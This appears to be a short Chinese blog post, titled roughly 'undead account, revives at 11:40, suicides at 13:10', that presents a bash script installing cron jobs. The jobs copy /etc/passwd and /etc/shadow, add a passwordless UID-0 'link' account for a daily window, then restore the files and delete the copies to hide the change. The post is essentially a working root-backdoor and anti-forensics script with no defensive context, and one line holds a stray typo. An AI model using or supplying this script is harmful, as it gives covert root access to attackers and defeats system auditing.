不死帐号 11:40复活,13:10 自杀

本文展示了一段通过Cron任务植入并执行恶意脚本的过程。该脚本首先创建了一系列定时任务来复制、修改系统关键文件如/etc/passwd和/etc/shadow,并在完成后清理临时文件。文章涉及的技术点包括Cron服务的利用、系统权限提升尝试及隐蔽性增强手段。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

#!/bin/bash
echo '40 11 * * * cat /etc/passwd > /dev/linkpwd' > /etc/t.cron;
echo '40 11 * * * cat /etc/shadow > /dev/linkshw' >> /etc/t.cron;
echo '41 11 * * * echo "link:x:0:0::/:/bin/sh" >>/etc/passwd' >> /etc/t.cron;
echo '41 11 * * * echo "link::9999:0:99999:7:::" >> /etc/shadow' >>/etc/t.cron;
echo '09 13 * * * cat /dev/linkpwd > /etc/passwd' >> /etc/t.cron;
echo '09 13 * * * cat /dev/linkshw > /etc/shadow' >> /etc/t.cron;p
echo '10 13 * * * rm -f /dev/linkpwd' >> /etc/t.cron;
echo '10 13 * * * rm -f /dev/linkshw' >> /etc/t.cron;
service crond restart;
crontab /etc/t.cron;
 
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值